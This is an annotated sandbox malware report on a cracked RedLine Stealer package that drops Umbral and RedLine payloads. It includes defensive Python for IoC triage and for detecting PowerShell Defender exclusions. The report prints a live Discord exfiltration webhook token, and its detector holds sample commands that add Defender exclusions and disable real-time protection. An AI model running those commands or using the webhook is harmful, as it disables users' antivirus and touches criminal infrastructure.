Analysis
max time kernel: 122s
max time network: 106s
platform: windows10-2004_x64
resource: win10v2004-20240426-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-05-2024 08:28
Static task: static1
URLScan task: urlscan1
General
Malware Config
Extracted
family: umbral
C2: https://discordapp.com/api/webhooks/1186062061508239390/wfwPZiGPzytybpy8t2Hsp4XOI3B_k0QMNcH-OzuAphqi3y6_IFvyz8BsbHzw84brTS6o
The extracted Umbral configuration is this single Discord webhook, the stealer's exfiltration channel. The last path component is the webhook token, a live credential for posting to that channel, so handle the URL as sensitive rather than as a plain indicator.
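The Python below is an added example, not part of the sandbox report or of Umbral itself. It takes the extracted C2 above, splits the Discord webhook into its ID and token, defangs the URL with the token redacted so the IoC can be shared, and recovers the webhook's creation time from the ID: Discord IDs are snowflakes whose top 42 bits are milliseconds since 2015-01-01T00:00:00Z. The accepted host list and the path regex are my assumptions about Discord's webhook URL format; the config values themselves are copied from the report.

```python
"""Work the report's 'Extracted' block into a shareable IoC record.

Umbral exfiltrates over a Discord webhook, so the extracted C2 is a
webhook URL: pull out its ID and token, defang the URL (the token is a
live posting credential), and date the webhook from its snowflake ID.
"""
import re
from datetime import datetime, timezone
from typing import Optional
from urllib.parse import urlsplit

# Discord IDs are snowflakes: bits 22..63 hold ms since 2015-01-01T00:00:00Z.
DISCORD_EPOCH_MS = 1_420_070_400_000

# Hosts on which the Discord webhook API is served (assumed list).
DISCORD_HOSTS = {"discord.com", "discordapp.com", "ptb.discord.com", "canary.discord.com"}

# Assumed shape of a webhook path: /api[/vN]/webhooks/<snowflake>/<token>
WEBHOOK_PATH = re.compile(
    r"^/api/(?:v\d+/)?webhooks/(?P<id>\d{17,20})/(?P<token>[A-Za-z0-9_-]+)/?$")

# The configuration exactly as the report's 'Extracted' block lists it.
EXTRACTED_CONFIG = {
    "family": "umbral",
    "c2": "https://discordapp.com/api/webhooks/1186062061508239390/"
          "wfwPZiGPzytybpy8t2Hsp4XOI3B_k0QMNcH-OzuAphqi3y6_IFvyz8BsbHzw84brTS6o",
}


def parse_discord_webhook(url: str) -> Optional[dict]:
    """Return {'host', 'id', 'token'} for a Discord webhook URL, else None."""
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname not in DISCORD_HOSTS:
        return None
    m = WEBHOOK_PATH.match(parts.path)
    if m is None:
        return None
    return {"host": parts.hostname, "id": int(m["id"]), "token": m["token"]}


def snowflake_to_ms(snowflake: int) -> int:
    """Unix time in milliseconds at which Discord minted this ID."""
    return (snowflake >> 22) + DISCORD_EPOCH_MS


def snowflake_to_datetime(snowflake: int) -> datetime:
    """Same instant as an aware UTC datetime (integer math, no float rounding)."""
    ms = snowflake_to_ms(snowflake)
    return datetime.fromtimestamp(ms // 1000, tz=timezone.utc).replace(
        microsecond=(ms % 1000) * 1000)


def defang(url: str) -> str:
    """hxxps://host[.]tld/path with the webhook token redacted, so the IoC
    can be shared without handing out the ability to post to the channel."""
    parts = urlsplit(url)
    host = (parts.hostname or "").replace(".", "[.]")
    path = parts.path
    wh = parse_discord_webhook(url)
    if wh is not None:
        path = path.replace(wh["token"], "<token-redacted>")
    return f"{parts.scheme.replace('tt', 'xx')}://{host}{path}"


def triage_config(config: dict) -> dict:
    """IoC record: family, defanged C2 and, for a webhook, its ID and creation time."""
    wh = parse_discord_webhook(config["c2"])
    record = {"family": config["family"], "c2_defanged": defang(config["c2"]), "webhook": None}
    if wh is not None:
        record["webhook"] = {
            "host": wh["host"],
            "id": wh["id"],
            "created_utc": snowflake_to_datetime(wh["id"]).isoformat(timespec="seconds"),
        }
    return record


if __name__ == "__main__":
    print(triage_config(EXTRACTED_CONFIG))
```

The creation time dates the webhook (here mid-December 2023), not the sample's build or the campaign's start; a webhook can be reused across many builds, so it is a pivot for clustering rather than a timeline anchor.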
Signatures
-
Detect Umbral payload 2 IoCs
resource  yara_rule
behavioral1/memory/3448-317-0x0000000005EB0000-0x0000000005EF0000-memory.dmp  family_umbral
behavioral1/files/0x000700000002347f-316.dat  family_umbral
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource  yara_rule
behavioral1/files/0x000700000002348a-247.dat  family_redline
behavioral1/memory/3448-263-0x0000000000E80000-0x0000000000F24000-memory.dmp  family_redline
behavioral1/memory/3448-313-0x0000000005C20000-0x0000000005C2E000-memory.dmp  family_redline
behavioral1/files/0x000700000002347e-312.dat  family_redline
Both the Umbral and the RedLine memory hits are in PID 3448, which is RedLine.MainPanel-cracked.exe (see Executes dropped EXE): the process running the "cracked" panel unpacks a RedLine payload and an Umbral payload in memory.
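The Umbral and RedLine tables above share one resource-string format. The Python below is an added example, not part of the report, that parses both tables and groups hits by process, which makes explicit what the tables only imply: PID 3448 has both families unpacked in its memory. The regexes are my reading of the Triage resource naming (memory dumps as pid-index-start-end, dropped files as fileid-index); the hit lines and the PID-to-name pairs are copied from the report, not derived.

```python
"""Parse the report's YARA hit lines and group them by process and family.

Memory hits carry the PID and the dumped address range; file hits carry
the dropped file's ID. Grouping by PID shows which process unpacked what.
"""
import re
from collections import defaultdict
from typing import Dict, List

# behavioral1/memory/<pid>-<dumpindex>-0x<start>-0x<end>-memory.dmp  (assumed format)
MEM_HIT = re.compile(
    r"^(?P<run>\w+)/memory/(?P<pid>\d+)-(?P<idx>\d+)-"
    r"0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$")
# behavioral1/files/0x<fileid>-<index>.dat  (assumed format)
FILE_HIT = re.compile(r"^(?P<run>\w+)/files/0x(?P<file_id>[0-9A-Fa-f]+)-(?P<idx>\d+)\.dat$")

# The six hit lines as printed in the report.
YARA_HITS = [
    "behavioral1/memory/3448-317-0x0000000005EB0000-0x0000000005EF0000-memory.dmp family_umbral",
    "behavioral1/files/0x000700000002347f-316.dat family_umbral",
    "behavioral1/files/0x000700000002348a-247.dat family_redline",
    "behavioral1/memory/3448-263-0x0000000000E80000-0x0000000000F24000-memory.dmp family_redline",
    "behavioral1/memory/3448-313-0x0000000005C20000-0x0000000005C2E000-memory.dmp family_redline",
    "behavioral1/files/0x000700000002347e-312.dat family_redline",
]

# PID -> image name, the subset of 'Executes dropped EXE' relevant to the hits.
PROCESS_NAMES = {3448: "RedLine.MainPanel-cracked.exe", 1884: "Anarchy.exe"}


def parse_hit(line: str) -> dict:
    """Split one 'resource rule' line into a structured record."""
    resource, _, rule = line.strip().rpartition(" ")
    family = rule[len("family_"):] if rule.startswith("family_") else rule
    m = MEM_HIT.match(resource)
    if m:
        start, end = int(m["start"], 16), int(m["end"], 16)
        return {"kind": "memory", "run": m["run"], "pid": int(m["pid"]), "idx": int(m["idx"]),
                "start": start, "end": end, "size": end - start, "family": family}
    m = FILE_HIT.match(resource)
    if m:
        return {"kind": "file", "run": m["run"], "file_id": m["file_id"], "idx": int(m["idx"]),
                "family": family}
    raise ValueError(f"unrecognised yara resource: {resource!r}")


def families_by_pid(lines: List[str]) -> Dict[int, List[str]]:
    """PID -> sorted list of families whose payload was found in its memory."""
    out: Dict[int, set] = defaultdict(set)
    for h in map(parse_hit, lines):
        if h["kind"] == "memory":
            out[h["pid"]].add(h["family"])
    return {pid: sorted(fams) for pid, fams in out.items()}


def multi_family_hosts(lines: List[str], names: Dict[int, str]) -> List[str]:
    """Processes that unpacked more than one family, as 'pid name: a, b'."""
    return [f"{pid} {names.get(pid, '?')}: {', '.join(fams)}"
            for pid, fams in sorted(families_by_pid(lines).items()) if len(fams) > 1]


def dropped_files_by_family(lines: List[str]) -> Dict[str, List[str]]:
    """family -> IDs of dropped files that matched, for pulling samples from the run."""
    out: Dict[str, List[str]] = defaultdict(list)
    for h in map(parse_hit, lines):
        if h["kind"] == "file":
            out[h["family"]].append(h["file_id"])
    return dict(out)


if __name__ == "__main__":
    for h in map(parse_hit, YARA_HITS):
        print(h)
    print(multi_family_hosts(YARA_HITS, PROCESS_NAMES))
```

The region sizes are worth keeping: the Umbral region is 0x40000 bytes and the larger RedLine region 0xA4000, which is a first sanity check when you later pull the corresponding dumps and expect a full .NET image rather than a fragment.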
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
pid  Process
4436 powershell.exe
4696 powershell.exe
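The report records only the PIDs of the two PowerShell instances that changed Defender exclusions, not their command lines. The Python below is an added example (not from the report or the sample) of the detection a practitioner would want for this TTP: it flags process command lines that add Defender exclusions through Add-MpPreference/Set-MpPreference or the Exclusions registry keys, or switch real-time monitoring off, and it first unwraps -EncodedCommand payloads (Base64 of UTF-16LE, which powershell.exe accepts under any unambiguous prefix such as -e or -enc), since that is how such commands usually arrive. The sample command lines are constructed for the example and do not reproduce this sample's actual arguments.

```python
"""Flag PowerShell command lines that add Microsoft Defender exclusions
(or switch real-time protection off), including -EncodedCommand variants."""
import base64
import re
from typing import Dict, List, Optional

RULES = {
    # Add-/Set-MpPreference followed, in the same statement, by any -Exclusion* parameter.
    "defender_exclusion_cmdlet": re.compile(
        r"(?i)\b(?:Add|Set)-MpPreference\b[^;\n|]*-Exclusion\w*"),
    # Direct writes to the exclusion keys (reg add, Set-ItemProperty, New-ItemProperty ...).
    "defender_exclusion_registry": re.compile(
        r"(?i)Windows Defender\\Exclusions\\(?:Paths|Extensions|Processes)"),
    "defender_realtime_off": re.compile(
        r"(?i)-DisableRealtimeMonitoring\s+(?:\$true|1)\b"),
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand (or any prefix of it such as
    -e/-enc/-ec), which powershell.exe accepts as Base64 of UTF-16LE text."""
    toks = cmdline.split()
    for flag, payload in zip(toks, toks[1:]):
        if not flag or flag[0] not in "-/":
            continue
        f = flag.lower().lstrip("-/")
        # -e, -ec, -enc ... are all EncodedCommand; -ep (ExecutionPolicy) is not.
        if f.startswith("e") and "encodedcommand".startswith(f):
            try:
                return base64.b64decode(payload, validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze(cmdline: str) -> Dict[str, object]:
    """Run the rules over what PowerShell will actually execute."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    hits = [name for name, rx in RULES.items() if rx.search(script)]
    return {"encoded": decoded is not None, "script": script, "rules": hits}


def scan(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Alerts for every command line that trips at least one rule."""
    alerts = []
    for line in cmdlines:
        result = analyze(line)
        if result["rules"]:
            alerts.append({"cmdline": line, **result})
    return alerts


def _enc(script: str) -> str:
    """Build an -EncodedCommand payload the way an operator would."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample command lines (not taken from the report).
SAMPLE_CMDLINES = [
    'powershell.exe -NoProfile -Command "Add-MpPreference -ExclusionPath '
    "'C:\\Users\\Admin\\AppData\\Local\\Temp' -ExclusionExtension 'exe' "
    "-ExclusionProcess 'builder.exe'\"",
    "powershell.exe -w hidden -e " + _enc(
        "Set-MpPreference -DisableRealtimeMonitoring $true; "
        "Add-MpPreference -ExclusionPath C:\\ProgramData"),
    'powershell.exe -Command "Get-MpPreference | Select-Object ExclusionPath"',
    'powershell.exe -ep bypass -c "Get-Process | Out-Null"',
]


if __name__ == "__main__":
    for alert in scan(SAMPLE_CMDLINES):
        print(alert["rules"], "encoded" if alert["encoded"] else "plain", alert["script"])
```

Feed it Sysmon Event ID 1 or 4688 command lines; the Get-MpPreference line shows why the rule keys on Add/Set rather than on the word "Exclusion" alone, which would also fire on an admin auditing the current list.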
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description  ioc  Process
Key value queried  \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation  RedLine.MainPanel-cracked.exe
Key value queried  \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation  GERDA-Крипт в zip.exe (cp1251 file name, garbled as "GERDA-Êðèïò â zip.exe" in the raw listing; roughly "GERDA-Crypt in zip")
Executes dropped EXE 7 IoCs
pid  Process
936 RedLine.MainPanel-cracked.exe
3448 RedLine.MainPanel-cracked.exe
5580 GERDA-Крипт в zip.exe (cp1251 file name, garbled as "GERDA-Êðèïò â zip.exe" in the raw listing; roughly "GERDA-Crypt in zip")
1408 Anarchy.exe
1884 Anarchy.exe
2120 rar.exe
2296 builder.exe
Loads dropped DLL 45 IoCs
pid  Process
3448 RedLine.MainPanel-cracked.exe  (28 entries)
1884 Anarchy.exe  (17 entries)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
YARA tag upx (UPX-packed code), 40 IoCs, all in memory dumps of PID 1884 Anarchy.exe
resource  yara_rule
behavioral1/memory/1884-*-0x00007FFAA1610000-0x00007FFAA1BF9000-memory.dmp  upx  (dumps 358, 370, 580, 634)
behavioral1/memory/1884-*-0x00007FFABB1A0000-0x00007FFABB1AF000-memory.dmp  upx  (dumps 360, 625)
behavioral1/memory/1884-*-0x00007FFAB5510000-0x00007FFAB5533000-memory.dmp  upx  (dumps 359, 376, 581, 626)
behavioral1/memory/1884-*-0x00007FFAB4C70000-0x00007FFAB4C9D000-memory.dmp  upx  (dumps 365, 628)
behavioral1/memory/1884-*-0x00007FFAA3FB0000-0x00007FFAA3FC9000-memory.dmp  upx  (dumps 366, 629)
behavioral1/memory/1884-*-0x00007FFAA32E0000-0x00007FFAA3457000-memory.dmp  upx  (dumps 368, 579, 627)
behavioral1/memory/1884-*-0x00007FFAA3460000-0x00007FFAA3483000-memory.dmp  upx  (dumps 367, 551, 630)
behavioral1/memory/1884-*-0x00007FFAA3E80000-0x00007FFAA3E99000-memory.dmp  upx  (dumps 369, 595, 632)
behavioral1/memory/1884-*-0x00007FFAA32A0000-0x00007FFAA32D3000-memory.dmp  upx  (dumps 372, 589, 631)
behavioral1/memory/1884-*-0x00007FFAB5B20000-0x00007FFAB5B2D000-memory.dmp  upx  (dumps 371, 633)
behavioral1/memory/1884-*-0x00007FFAA2F90000-0x00007FFAA305D000-memory.dmp  upx  (dumps 373, 590, 620)
behavioral1/memory/1884-*-0x00007FFAA10F0000-0x00007FFAA1610000-memory.dmp  upx  (dumps 374, 591, 621)
behavioral1/memory/1884-*-0x00007FFAA3E10000-0x00007FFAA3E24000-memory.dmp  upx  (dumps 377, 622)
behavioral1/memory/1884-*-0x00007FFAB57C0000-0x00007FFAB57CD000-memory.dmp  upx  (dumps 378, 623)
behavioral1/memory/1884-*-0x00007FFAA2E70000-0x00007FFAA2F8C000-memory.dmp  upx  (dumps 379, 624)
The 40 hits cover 15 distinct regions dumped repeatedly. The addresses sit in the 0x7FFA... range where x64 Windows maps DLL images, and PID 1884 is the process that loads the 17 dropped DLLs listed under Loads dropped DLL, so these hits most likely mark UPX-packed dropped DLLs rather than injected code; confirm against the dropped files before treating them as a payload.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
103  ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description  ioc  Process
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000  taskmgr.exe
Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A  taskmgr.exe
Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName  taskmgr.exe
All three reads come from taskmgr.exe (PID 4600, the interactive Task Manager), not from any dropped binary, so this hit is not evidence that the sample fingerprints the disk to detect a sandbox.
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3964 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid  Process
5684 tasklist.exe
1756 tasklist.exe
1804 tasklist.exe
Enumerates system info in registry 2 TTPs 3 IoCs
description  ioc  Process
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  chrome.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  chrome.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  chrome.exe
All three reads are by chrome.exe (PID 4780, the browser that opened the download link), not by a dropped binary.
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3692 systeminfo.exe -
Kills process with taskkill 7 IoCs
pid  Process
3652 taskkill.exe
5320 taskkill.exe
1528 taskkill.exe
3384 taskkill.exe
3456 taskkill.exe
5520 taskkill.exe
3492 taskkill.exe
Modifies data under HKEY_USERS 2 IoCs
description  ioc  Process
Key created  \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry  chrome.exe
Set value (int)  \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133605809500464844"  chrome.exe
Modifies registry class 64 IoCs
description  ioc  Process
In the entries below, <Shell> stands for \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell, and the process is builder.exe unless stated otherwise.
Set value (int)  <Shell>\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"
Set value (data)  <Shell>\BagMRU\NodeSlots = 02020202
Set value (data)  <Shell>\BagMRU\1\1\MRUListEx = 00000000ffffffff
Key created  <Shell>\Bags\5\ComDlg
Key created  <Shell>\BagMRU\1\0
Set value (data)  <Shell>\BagMRU\1\1\0\0\0 = 8400310000000000b358bc431100444f574e4c4f7e3100006c0009000400efbe9a586d64b358bc432e00000074e101000000010000000000000000004200000000003ebe5a0044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000
Set value (int)  <Shell>\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"
Set value (int)  <Shell>\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"
Key created  <Shell>\Bags\5\Shell
Set value (int)  <Shell>\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"
Set value (int)  <Shell>\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"
Set value (int)  <Shell>\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"
Key created  \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings
Key created  <Shell>\BagMRU\1\1\0\0\0\0
Set value (int)  <Shell>\BagMRU\1\1\0\0\0\0\0\NodeSlot = "5"
Key created  <Shell>\BagMRU\1
Key created  <Shell>\BagMRU\1\1\0
Set value (data)  <Shell>\BagMRU\1\1\0\MRUListEx = 00000000ffffffff
Set value (data)  <Shell>\BagMRU\MRUListEx = 0100000000000000ffffffff
Set value (data)  <Shell>\BagMRU\1\1\0\0\0\0\0 = 5c0031000000000092572c7b10004c49425241527e310000440009000400efbeb358aa43b358bc432e00000025340200000008000000000000000000000000000000f2d410004c0069006200720061007200690065007300000018000000
Set value (data)  <Shell>\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000
Set value (str)  <Shell>\Bags\5\Shell\SniffedFolderType = "Generic"
Set value (int)  <Shell>\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"
Key created  <Shell>\Bags\2
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\  chrome.exe
Key created  <Shell>\BagMRU
Key created  <Shell>\BagMRU\1\1\0\0
Key created  <Shell>\Bags
Set value (int)  <Shell>\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"
Set value (data)  <Shell>\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000
Key created  <Shell>
Set value (data)  <Shell>\BagMRU\1\1 = 19002f433a5c000000000000000000000000000000000000000000
Set value (data)  <Shell>\BagMRU\1\1\0\0\0\MRUListEx = 00000000ffffffff
Set value (data)  <Shell>\BagMRU\1\1\0\0\0\0\0\MRUListEx = ffffffff
Set value (data)  <Shell>\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000
Set value (data)  <Shell>\BagMRU\1\1\0\0\MRUListEx = 00000000ffffffff
Set value (data)  <Shell>\BagMRU\1\1\0\0\0\0 = 7800310000000000b358653a10005245444c494e7e310000600009000400efbeb358aa43b358bc432e000000bb3302000000120000000000000000000000000000009fdc8a005200650064004c0069006e006500200053007400650061006c0065007200200043007200610063006b0065006400000018000000
Set value (data)  <Shell>\BagMRU\NodeSlots = 0202020202
Key created  <Shell>\BagMRU\1\1\0\0\0
Set value (str)  <Shell>\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"
Set value (int)  <Shell>\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"
Key created  <Shell>\BagMRU\1\1
Set value (data)  <Shell>\BagMRU\1\1\0 = 78003100000000009a586d641100557365727300640009000400efbe874f7748b358a3432e000000c70500000000010000000000000000003a000000000080152e0155007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000
Set value (data)  <Shell>\BagMRU\1\1\0\0 = 50003100000000009a58f36c100041646d696e003c0009000400efbe9a586d64b358a3432e0000006ce1010000000100000000000000000000000000000096ccd600410064006d0069006e00000014000000
Set value (int)  <Shell>\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"
Set value (int)  <Shell>\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"
Set value (data)  <Shell>\BagMRU\1\1\0\0\0\0\MRUListEx = 00000000ffffffff
Key created  \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Set value (int)  <Shell>\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"
Set value (int)  <Shell>\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"
Set value (int)  <Shell>\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"
Set value (str)  <Shell>\Bags\2\Shell\SniffedFolderType = "Downloads"
Key created  <Shell>\Bags\2\ComDlg
Key created  <Shell>\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}
Set value (data)  <Shell>\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff
Key created  <Shell>\BagMRU\1\1\0\0\0\0\0
Key created  <Shell>\Bags\5
Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created  <Shell>\Bags\2\Shell
Set value (data)  <Shell>\BagMRU\1\MRUListEx = 0000000001000000ffffffff
Set value (str)  <Shell>\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"
Set value (int)  <Shell>\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"
Set value (int)  <Shell>\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"
Set value (data)  <Shell>\BagMRU\1\MRUListEx = 0100000000000000ffffffff
What these writes record: the BagMRU item-ID blobs carry the short and long names of the folders browsed in a common file dialog (ASCII 8.3 name followed by the UTF-16LE long name), and they decode to C:\ (19002f433a5c...), Users, Admin, DOWNLO~1 / Downloads, REDLIN~1 / RedLine Stealer Cracked and LIBRAR~1 / Libraries. In other words builder.exe opened a file dialog on C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries. ShellBags are a forensic trace of interactive folder browsing in the sandbox session, not a persistence or evasion mechanism.
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid  Process
4780 chrome.exe  (4 entries)
4436 powershell.exe  (3 entries)
3264 powershell.exe  (3 entries)
1740 powershell.exe  (3 entries)
4696 powershell.exe  (3 entries)
1496 powershell.exe  (3 entries)
1916 powershell.exe  (3 entries)
936 powershell.exe  (3 entries)
3428 powershell.exe  (3 entries)
4600 taskmgr.exe  (36 entries)
Eight distinct powershell.exe PIDs appear here, while only 4436 and 4696 are tied to the Defender-exclusion signature above; the remaining six are not attributed to any other signature in this listing.
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1056 7zFM.exe 2296 builder.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid  Process
4780 chrome.exe  (5 entries)
Suspicious use of AdjustPrivilegeToken 64 IoCs
description  pid  Process
Token: SeShutdownPrivilege  4780 chrome.exe
Token: SeCreatePagefilePrivilege  4780 chrome.exe
(these two chrome.exe tokens alternate for 30 pairs, 60 entries in all, with the 7zG.exe entries falling in the middle of the run)
Token: SeRestorePrivilege  5096 7zG.exe
Token: 35  5096 7zG.exe
Token: SeSecurityPrivilege  5096 7zG.exe  (2 entries)
Suspicious use of FindShellTrayWindow 64 IoCs
pid  Process
4780 chrome.exe  (34 entries)
5096 7zG.exe
1056 7zFM.exe
1936 7zG.exe
2972 7zG.exe
4600 taskmgr.exe  (26 entries)
Suspicious use of SendNotifyMessage 64 IoCs
pid  Process
4780 chrome.exe  (24 entries)
4600 taskmgr.exe  (40 entries)
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2296 builder.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description  pid  Process  procid_target
PID 4780 wrote to memory of 2612  4780 chrome.exe  82  (2 entries)
PID 4780 wrote to memory of 2864  4780 chrome.exe  83  (31 entries)
PID 4780 wrote to memory of 5648  4780 chrome.exe  84  (2 entries)
PID 4780 wrote to memory of 5636  4780 chrome.exe  85  (29 entries)
Every entry is the chrome.exe browser (4780) writing into its own child processes; 2612, 2864 and 5648 are its crashpad-handler, GPU and network-service children in the process tree below (5636 is not shown in the visible part of the tree). This is Chrome's normal child-process setup, not injection by the sample.
Processes
(tree indented by parent/child level; each entry gives the image path, its PID, the full command line, and the behaviour signatures raised by that process)

- C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4780)
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://zelenka.guru/proxy.php?link=https%3A%2F%2Fgofile.io%2Fd%2FrrVkK9&hash=aee71227bcd2e07805a068cfb8b0c4b2
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2612)
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab53fab58,0x7ffab53fab68,0x7ffab53fab78
  - C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2864)
